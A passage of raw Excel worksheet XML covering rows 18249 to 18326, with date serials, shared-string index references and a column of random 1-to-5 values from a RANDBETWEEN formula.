      <c r="A18249" s="1">
        <v>43167.677708333336</v>
      </c>
      <c r="C18249" t="s">
        <v>10</v>
      </c>
      <c r="D18249" t="s">
        <v>178</v>
      </c>
      <c r="E18249" s="2" t="s">
        <v>16332</v>
      </c>
      <c r="F18249">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18250" s="1">
        <v>43167.673750000002</v>
      </c>
      <c r="C18250" t="s">
        <v>10</v>
      </c>
      <c r="D18250" t="s">
        <v>163</v>
      </c>
      <c r="E18250" t="s">
        <v>16333</v>
      </c>
      <c r="F18250">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18251" s="1">
        <v>43167.624571759261</v>
      </c>
      <c r="C18251" t="s">
        <v>6</v>
      </c>
      <c r="D18251" t="s">
        <v>25</v>
      </c>
      <c r="E18251" t="s">
        <v>16334</v>
      </c>
      <c r="F18251">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18252" s="1">
        <v>43167.61787037037</v>
      </c>
      <c r="C18252" t="s">
        <v>48</v>
      </c>
      <c r="E18252" t="s">
        <v>16335</v>
      </c>
      <c r="F18252">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18253" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18253" s="1">
        <v>43167.613113425927</v>
      </c>
      <c r="C18253" t="s">
        <v>10</v>
      </c>
      <c r="D18253" t="s">
        <v>112</v>
      </c>
      <c r="E18253" s="2" t="s">
        <v>16336</v>
      </c>
      <c r="F18253">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18254" s="1">
        <v>43167.610196759262</v>
      </c>
      <c r="C18254" t="s">
        <v>6</v>
      </c>
      <c r="D18254" t="s">
        <v>25</v>
      </c>
      <c r="E18254" t="s">
        <v>16337</v>
      </c>
      <c r="F18254">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18255" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18255" s="1">
        <v>43167.603587962964</v>
      </c>
      <c r="C18255" t="s">
        <v>10</v>
      </c>
      <c r="D18255" t="s">
        <v>6</v>
      </c>
      <c r="E18255" s="2" t="s">
        <v>16338</v>
      </c>
      <c r="F18255">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18256" s="1">
        <v>43167.562048611115</v>
      </c>
      <c r="C18256" t="s">
        <v>10</v>
      </c>
      <c r="D18256" t="s">
        <v>6</v>
      </c>
      <c r="E18256" t="s">
        <v>16339</v>
      </c>
      <c r="F18256">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18257" s="1">
        <v>43167.531817129631</v>
      </c>
      <c r="C18257" t="s">
        <v>10</v>
      </c>
      <c r="D18257" t="s">
        <v>94</v>
      </c>
      <c r="E18257" t="s">
        <v>16340</v>
      </c>
      <c r="F18257">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18258" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18258" s="1">
        <v>43167.522083333337</v>
      </c>
      <c r="C18258" t="s">
        <v>41</v>
      </c>
      <c r="E18258" s="2" t="s">
        <v>16341</v>
      </c>
      <c r="F18258">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18259" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18259" s="1">
        <v>43167.515462962961</v>
      </c>
      <c r="C18259" t="s">
        <v>10</v>
      </c>
      <c r="D18259" t="s">
        <v>374</v>
      </c>
      <c r="E18259" s="2" t="s">
        <v>16342</v>
      </c>
      <c r="F18259">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18260" s="1">
        <v>43167.509351851855</v>
      </c>
      <c r="C18260" t="s">
        <v>48</v>
      </c>
      <c r="E18260" t="s">
        <v>16343</v>
      </c>
      <c r="F18260">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18261" s="1">
        <v>43167.497002314813</v>
      </c>
      <c r="C18261" t="s">
        <v>10</v>
      </c>
      <c r="D18261" t="s">
        <v>20</v>
      </c>
      <c r="F18261">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18262" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18262" s="1">
        <v>43167.489745370367</v>
      </c>
      <c r="C18262" t="s">
        <v>1189</v>
      </c>
      <c r="D18262" t="s">
        <v>11</v>
      </c>
      <c r="E18262" s="2" t="s">
        <v>16344</v>
      </c>
      <c r="F18262">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18263" s="1">
        <v>43167.48578703704</v>
      </c>
      <c r="C18263" t="s">
        <v>10</v>
      </c>
      <c r="D18263" t="s">
        <v>20</v>
      </c>
      <c r="E18263" t="s">
        <v>16345</v>
      </c>
      <c r="F18263">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18264" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18264" s="1">
        <v>43167.479224537034</v>
      </c>
      <c r="C18264" t="s">
        <v>29</v>
      </c>
      <c r="D18264" t="s">
        <v>20</v>
      </c>
      <c r="E18264" s="2" t="s">
        <v>16283</v>
      </c>
      <c r="F18264">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18265" s="1">
        <v>43167.462881944448</v>
      </c>
      <c r="C18265" t="s">
        <v>10</v>
      </c>
      <c r="D18265" t="s">
        <v>1160</v>
      </c>
      <c r="E18265" t="s">
        <v>16346</v>
      </c>
      <c r="F18265">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18266" s="1">
        <v>43167.460810185185</v>
      </c>
      <c r="C18266" t="s">
        <v>10</v>
      </c>
      <c r="D18266" t="s">
        <v>494</v>
      </c>
      <c r="E18266" t="s">
        <v>16347</v>
      </c>
      <c r="F18266">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18267" s="1">
        <v>43167.456875000003</v>
      </c>
      <c r="C18267" t="s">
        <v>10</v>
      </c>
      <c r="D18267" t="s">
        <v>89</v>
      </c>
      <c r="E18267" t="s">
        <v>16348</v>
      </c>
      <c r="F18267">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18268" s="1">
        <v>43167.442488425928</v>
      </c>
      <c r="C18268" t="s">
        <v>6</v>
      </c>
      <c r="D18268" t="s">
        <v>25</v>
      </c>
      <c r="E18268" t="s">
        <v>16349</v>
      </c>
      <c r="F18268">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18269" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18269" s="1">
        <v>43167.44153935185</v>
      </c>
      <c r="C18269" t="s">
        <v>50</v>
      </c>
      <c r="D18269" t="s">
        <v>67</v>
      </c>
      <c r="E18269" s="2" t="s">
        <v>16350</v>
      </c>
      <c r="F18269">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18270" s="1">
        <v>43167.413923611108</v>
      </c>
      <c r="C18270" t="s">
        <v>10</v>
      </c>
      <c r="D18270" t="s">
        <v>20</v>
      </c>
      <c r="E18270" t="s">
        <v>16351</v>
      </c>
      <c r="F18270">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18271" s="1">
        <v>43167.41170138889</v>
      </c>
      <c r="C18271" t="s">
        <v>6</v>
      </c>
      <c r="D18271" t="s">
        <v>194</v>
      </c>
      <c r="E18271" t="s">
        <v>16352</v>
      </c>
      <c r="F18271">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18272" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18272" s="1">
        <v>43167.38821759259</v>
      </c>
      <c r="C18272" t="s">
        <v>10</v>
      </c>
      <c r="D18272" t="s">
        <v>36</v>
      </c>
      <c r="E18272" s="2" t="s">
        <v>16353</v>
      </c>
      <c r="F18272">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18273" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18273" s="1">
        <v>43167.37290509259</v>
      </c>
      <c r="C18273" t="s">
        <v>463</v>
      </c>
      <c r="E18273" s="2" t="s">
        <v>16354</v>
      </c>
      <c r="F18273">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18274" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18274" s="1">
        <v>43167.278229166666</v>
      </c>
      <c r="C18274" t="s">
        <v>45</v>
      </c>
      <c r="E18274" s="2" t="s">
        <v>16355</v>
      </c>
      <c r="F18274">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18275" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18275" s="1">
        <v>43167.23777777778</v>
      </c>
      <c r="C18275" t="s">
        <v>50</v>
      </c>
      <c r="E18275" s="2" t="s">
        <v>16356</v>
      </c>
      <c r="F18275">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18276" s="1">
        <v>43167.237314814818</v>
      </c>
      <c r="C18276" t="s">
        <v>189</v>
      </c>
      <c r="E18276" t="s">
        <v>16357</v>
      </c>
      <c r="F18276">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18277" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18277" s="1">
        <v>43167.218854166669</v>
      </c>
      <c r="C18277" t="s">
        <v>1130</v>
      </c>
      <c r="E18277" s="2" t="s">
        <v>16358</v>
      </c>
      <c r="F18277">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18278" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18278" s="1">
        <v>43167.211539351854</v>
      </c>
      <c r="C18278" t="s">
        <v>124</v>
      </c>
      <c r="E18278" s="2" t="s">
        <v>16359</v>
      </c>
      <c r="F18278">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18279" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A18279" s="1">
        <v>43167.183310185188</v>
      </c>
      <c r="C18279" t="s">
        <v>71</v>
      </c>
      <c r="E18279" s="2" t="s">
        <v>16360</v>
      </c>
      <c r="F18279">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18280" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18280" s="1">
        <v>43167.171076388891</v>
      </c>
      <c r="C18280" t="s">
        <v>430</v>
      </c>
      <c r="E18280" s="2" t="s">
        <v>16361</v>
      </c>
      <c r="F18280">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18281" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A18281" s="1">
        <v>43167.125011574077</v>
      </c>
      <c r="C18281" t="s">
        <v>10</v>
      </c>
      <c r="D18281" t="s">
        <v>20</v>
      </c>
      <c r="E18281" s="2" t="s">
        <v>16362</v>
      </c>
      <c r="F18281">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18282" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18282" s="1">
        <v>43167.110081018516</v>
      </c>
      <c r="C18282" t="s">
        <v>8872</v>
      </c>
      <c r="E18282" s="2" t="s">
        <v>16363</v>
      </c>
      <c r="F18282">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18283" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18283" s="1">
        <v>43167.09611111111</v>
      </c>
      <c r="C18283" t="s">
        <v>1931</v>
      </c>
      <c r="E18283" s="2" t="s">
        <v>16364</v>
      </c>
      <c r="F18283">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18284" s="1">
        <v>43167.091747685183</v>
      </c>
      <c r="C18284" t="s">
        <v>41</v>
      </c>
      <c r="E18284" t="s">
        <v>16365</v>
      </c>
      <c r="F18284">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18285" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18285" s="1">
        <v>43167.078622685185</v>
      </c>
      <c r="C18285" t="s">
        <v>10</v>
      </c>
      <c r="D18285" t="s">
        <v>36</v>
      </c>
      <c r="E18285" s="2" t="s">
        <v>16366</v>
      </c>
      <c r="F18285">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18286" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18286" s="1">
        <v>43167.076504629629</v>
      </c>
      <c r="C18286" t="s">
        <v>10</v>
      </c>
      <c r="D18286" t="s">
        <v>178</v>
      </c>
      <c r="E18286" s="2" t="s">
        <v>16367</v>
      </c>
      <c r="F18286">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18287" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18287" s="1">
        <v>43167.074363425927</v>
      </c>
      <c r="C18287" t="s">
        <v>724</v>
      </c>
      <c r="E18287" s="2" t="s">
        <v>16368</v>
      </c>
      <c r="F18287">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18288" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18288" s="1">
        <v>43167.071493055555</v>
      </c>
      <c r="C18288" t="s">
        <v>71</v>
      </c>
      <c r="E18288" s="2" t="s">
        <v>16369</v>
      </c>
      <c r="F18288">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18289" s="1">
        <v>43167.058530092596</v>
      </c>
      <c r="C18289" t="s">
        <v>41</v>
      </c>
      <c r="E18289" t="s">
        <v>16370</v>
      </c>
      <c r="F18289">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18290" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18290" s="1">
        <v>43166.850578703707</v>
      </c>
      <c r="C18290" t="s">
        <v>10</v>
      </c>
      <c r="D18290" t="s">
        <v>89</v>
      </c>
      <c r="E18290" s="2" t="s">
        <v>16371</v>
      </c>
      <c r="F18290">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18291" s="1">
        <v>43166.78229166667</v>
      </c>
      <c r="C18291" t="s">
        <v>10</v>
      </c>
      <c r="D18291" t="s">
        <v>6</v>
      </c>
      <c r="E18291" t="s">
        <v>16372</v>
      </c>
      <c r="F18291">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18292" s="1">
        <v>43166.711435185185</v>
      </c>
      <c r="C18292" t="s">
        <v>10</v>
      </c>
      <c r="D18292" t="s">
        <v>151</v>
      </c>
      <c r="E18292" t="s">
        <v>16373</v>
      </c>
      <c r="F18292">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18293" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18293" s="1">
        <v>43166.710949074077</v>
      </c>
      <c r="C18293" t="s">
        <v>10</v>
      </c>
      <c r="D18293" t="s">
        <v>20</v>
      </c>
      <c r="E18293" s="2" t="s">
        <v>16374</v>
      </c>
      <c r="F18293">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18294" s="1">
        <v>43166.694305555553</v>
      </c>
      <c r="C18294" t="s">
        <v>6</v>
      </c>
      <c r="D18294" t="s">
        <v>821</v>
      </c>
      <c r="E18294" t="s">
        <v>16375</v>
      </c>
      <c r="F18294">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18295" s="1">
        <v>43166.680798611109</v>
      </c>
      <c r="C18295" t="s">
        <v>10</v>
      </c>
      <c r="D18295" t="s">
        <v>178</v>
      </c>
      <c r="E18295" t="s">
        <v>16376</v>
      </c>
      <c r="F18295">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18296" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18296" s="1">
        <v>43166.666041666664</v>
      </c>
      <c r="C18296" t="s">
        <v>163</v>
      </c>
      <c r="D18296" t="s">
        <v>56</v>
      </c>
      <c r="E18296" s="2" t="s">
        <v>16377</v>
      </c>
      <c r="F18296">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18297" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18297" s="1">
        <v>43166.659236111111</v>
      </c>
      <c r="C18297" t="s">
        <v>10</v>
      </c>
      <c r="D18297" t="s">
        <v>330</v>
      </c>
      <c r="E18297" s="2" t="s">
        <v>16378</v>
      </c>
      <c r="F18297">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18298" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18298" s="1">
        <v>43166.653344907405</v>
      </c>
      <c r="C18298" t="s">
        <v>4963</v>
      </c>
      <c r="D18298" t="s">
        <v>1056</v>
      </c>
      <c r="E18298" s="2" t="s">
        <v>16379</v>
      </c>
      <c r="F18298">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18299" s="1">
        <v>43166.641087962962</v>
      </c>
      <c r="C18299" t="s">
        <v>10</v>
      </c>
      <c r="D18299" t="s">
        <v>46</v>
      </c>
      <c r="E18299" t="s">
        <v>16380</v>
      </c>
      <c r="F18299">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18300" s="1">
        <v>43166.635289351849</v>
      </c>
      <c r="C18300" t="s">
        <v>10</v>
      </c>
      <c r="D18300" t="s">
        <v>17</v>
      </c>
      <c r="E18300" t="s">
        <v>16381</v>
      </c>
      <c r="F18300">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18301" s="1">
        <v>43166.62840277778</v>
      </c>
      <c r="C18301" t="s">
        <v>154</v>
      </c>
      <c r="E18301" t="s">
        <v>16382</v>
      </c>
      <c r="F18301">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18302" s="1">
        <v>43166.619189814817</v>
      </c>
      <c r="C18302" t="s">
        <v>10</v>
      </c>
      <c r="D18302" t="s">
        <v>494</v>
      </c>
      <c r="E18302" t="s">
        <v>16383</v>
      </c>
      <c r="F18302">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18303" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18303" s="1">
        <v>43166.576458333337</v>
      </c>
      <c r="C18303" t="s">
        <v>10</v>
      </c>
      <c r="D18303" t="s">
        <v>107</v>
      </c>
      <c r="E18303" s="2" t="s">
        <v>16384</v>
      </c>
      <c r="F18303">
        <f t="shared" ca="1" si="285"/>
        <v>5</v>
      </c>
    </row>
    <row r="18304" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18304" s="1">
        <v>43166.560173611113</v>
      </c>
      <c r="C18304" t="s">
        <v>10</v>
      </c>
      <c r="D18304" t="s">
        <v>6</v>
      </c>
      <c r="E18304" s="2" t="s">
        <v>16385</v>
      </c>
      <c r="F18304">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18305" s="1">
        <v>43166.553078703706</v>
      </c>
      <c r="C18305" t="s">
        <v>103</v>
      </c>
      <c r="F18305">
        <f t="shared" ca="1" si="285"/>
        <v>1</v>
      </c>
    </row>
    <row r="18306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18306" s="1">
        <v>43166.542962962965</v>
      </c>
      <c r="C18306" t="s">
        <v>10</v>
      </c>
      <c r="D18306" t="s">
        <v>56</v>
      </c>
      <c r="E18306" t="s">
        <v>16386</v>
      </c>
      <c r="F18306">
        <f t="shared" ref="F18306:F18369" ca="1" si="286">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="18307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18307" s="1">
        <v>43166.536203703705</v>
      </c>
      <c r="C18307" t="s">
        <v>10</v>
      </c>
      <c r="D18307" t="s">
        <v>36</v>
      </c>
      <c r="E18307" t="s">
        <v>16387</v>
      </c>
      <c r="F18307">
        <f t="shared" ca="1" si="286"/>
        <v>4</v>
      </c>
    </row>
    <row r="18308" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18308" s="1">
        <v>43166.521678240744</v>
      </c>
      <c r="C18308" t="s">
        <v>10</v>
      </c>
      <c r="D18308" t="s">
        <v>94</v>
      </c>
      <c r="E18308" s="2" t="s">
        <v>16388</v>
      </c>
      <c r="F18308">
        <f t="shared" ca="1" si="286"/>
        <v>4</v>
      </c>
    </row>
    <row r="18309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18309" s="1">
        <v>43166.49858796296</v>
      </c>
      <c r="C18309" t="s">
        <v>10</v>
      </c>
      <c r="D18309" t="s">
        <v>86</v>
      </c>
      <c r="E18309" t="s">
        <v>16389</v>
      </c>
      <c r="F18309">
        <f t="shared" ca="1" si="286"/>
        <v>4</v>
      </c>
    </row>
    <row r="18310" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A18310" s="1">
        <v>43166.490405092591</v>
      </c>
      <c r="C18310" t="s">
        <v>10</v>
      </c>
      <c r="D18310" t="s">
        <v>158</v>
      </c>
      <c r="E18310" s="2" t="s">
        <v>16390</v>
      </c>
      <c r="F18310">
        <f t="shared" ca="1" si="286"/>
        <v>1</v>
      </c>
    </row>
    <row r="18311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18311" s="1">
        <v>43166.488923611112</v>
      </c>
      <c r="C18311" t="s">
        <v>10</v>
      </c>
      <c r="D18311" t="s">
        <v>251</v>
      </c>
      <c r="E18311" t="s">
        <v>16391</v>
      </c>
      <c r="F18311">
        <f t="shared" ca="1" si="286"/>
        <v>5</v>
      </c>
    </row>
    <row r="18312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18312" s="1">
        <v>43166.462337962963</v>
      </c>
      <c r="C18312" t="s">
        <v>10</v>
      </c>
      <c r="D18312" t="s">
        <v>20</v>
      </c>
      <c r="E18312" t="s">
        <v>16392</v>
      </c>
      <c r="F18312">
        <f t="shared" ca="1" si="286"/>
        <v>4</v>
      </c>
    </row>
    <row r="18313" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18313" s="1">
        <v>43166.439525462964</v>
      </c>
      <c r="C18313" t="s">
        <v>71</v>
      </c>
      <c r="E18313" s="2" t="s">
        <v>16393</v>
      </c>
      <c r="F18313">
        <f t="shared" ca="1" si="286"/>
        <v>3</v>
      </c>
    </row>
    <row r="18314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18314" s="1">
        <v>43166.437118055554</v>
      </c>
      <c r="C18314" t="s">
        <v>461</v>
      </c>
      <c r="D18314" t="s">
        <v>885</v>
      </c>
      <c r="E18314" t="s">
        <v>16394</v>
      </c>
      <c r="F18314">
        <f t="shared" ca="1" si="286"/>
        <v>3</v>
      </c>
    </row>
    <row r="18315" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18315" s="1">
        <v>43166.402430555558</v>
      </c>
      <c r="C18315" t="s">
        <v>461</v>
      </c>
      <c r="D18315" t="s">
        <v>94</v>
      </c>
      <c r="E18315" t="s">
        <v>16395</v>
      </c>
      <c r="F18315">
        <f t="shared" ca="1" si="286"/>
        <v>1</v>
      </c>
    </row>
    <row r="18316" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18316" s="1">
        <v>43166.401030092595</v>
      </c>
      <c r="C18316" t="s">
        <v>4970</v>
      </c>
      <c r="E18316" s="2" t="s">
        <v>16396</v>
      </c>
      <c r="F18316">
        <f t="shared" ca="1" si="286"/>
        <v>2</v>
      </c>
    </row>
    <row r="18317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18317" s="1">
        <v>43166.394537037035</v>
      </c>
      <c r="C18317" t="s">
        <v>10</v>
      </c>
      <c r="D18317" t="s">
        <v>163</v>
      </c>
      <c r="E18317" t="s">
        <v>16397</v>
      </c>
      <c r="F18317">
        <f t="shared" ca="1" si="286"/>
        <v>3</v>
      </c>
    </row>
    <row r="18318" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18318" s="1">
        <v>43166.389409722222</v>
      </c>
      <c r="C18318" t="s">
        <v>163</v>
      </c>
      <c r="D18318" t="s">
        <v>94</v>
      </c>
      <c r="E18318" s="2" t="s">
        <v>16398</v>
      </c>
      <c r="F18318">
        <f t="shared" ca="1" si="286"/>
        <v>5</v>
      </c>
    </row>
    <row r="18319" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18319" s="1">
        <v>43166.365914351853</v>
      </c>
      <c r="C18319" t="s">
        <v>559</v>
      </c>
      <c r="E18319" s="2" t="s">
        <v>16399</v>
      </c>
      <c r="F18319">
        <f t="shared" ca="1" si="286"/>
        <v>4</v>
      </c>
    </row>
    <row r="18320" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18320" s="1">
        <v>43166.361493055556</v>
      </c>
      <c r="C18320" t="s">
        <v>260</v>
      </c>
      <c r="E18320" s="2" t="s">
        <v>16400</v>
      </c>
      <c r="F18320">
        <f t="shared" ca="1" si="286"/>
        <v>3</v>
      </c>
    </row>
    <row r="18321" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18321" s="1">
        <v>43166.359803240739</v>
      </c>
      <c r="C18321" t="s">
        <v>10</v>
      </c>
      <c r="D18321" t="s">
        <v>41</v>
      </c>
      <c r="E18321" s="2" t="s">
        <v>16401</v>
      </c>
      <c r="F18321">
        <f t="shared" ca="1" si="286"/>
        <v>5</v>
      </c>
    </row>
    <row r="18322" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18322" s="1">
        <v>43166.359479166669</v>
      </c>
      <c r="C18322" t="s">
        <v>10</v>
      </c>
      <c r="D18322" t="s">
        <v>80</v>
      </c>
      <c r="E18322" s="2" t="s">
        <v>16402</v>
      </c>
      <c r="F18322">
        <f t="shared" ca="1" si="286"/>
        <v>2</v>
      </c>
    </row>
    <row r="18323" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18323" s="1">
        <v>43166.351747685185</v>
      </c>
      <c r="C18323" t="s">
        <v>4508</v>
      </c>
      <c r="D18323" t="s">
        <v>1056</v>
      </c>
      <c r="E18323" s="2" t="s">
        <v>16403</v>
      </c>
      <c r="F18323">
        <f t="shared" ca="1" si="286"/>
        <v>4</v>
      </c>
    </row>
    <row r="18324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18324" s="1">
        <v>43166.331006944441</v>
      </c>
      <c r="C18324" t="s">
        <v>1688</v>
      </c>
      <c r="E18324" t="s">
        <v>16404</v>
      </c>
      <c r="F18324">
        <f t="shared" ca="1" si="286"/>
        <v>1</v>
      </c>
    </row>
    <row r="18325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18325" s="1">
        <v>43166.31287037037</v>
      </c>
      <c r="C18325" t="s">
        <v>461</v>
      </c>
      <c r="D18325" t="s">
        <v>124</v>
      </c>
      <c r="E18325" t="s">
        <v>16405</v>
      </c>
      <c r="F18325">
        <f t="shared" ca="1" si="286"/>
        <v>5</v>
      </c>
    </row>
    <row r="18326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18326" s="1">
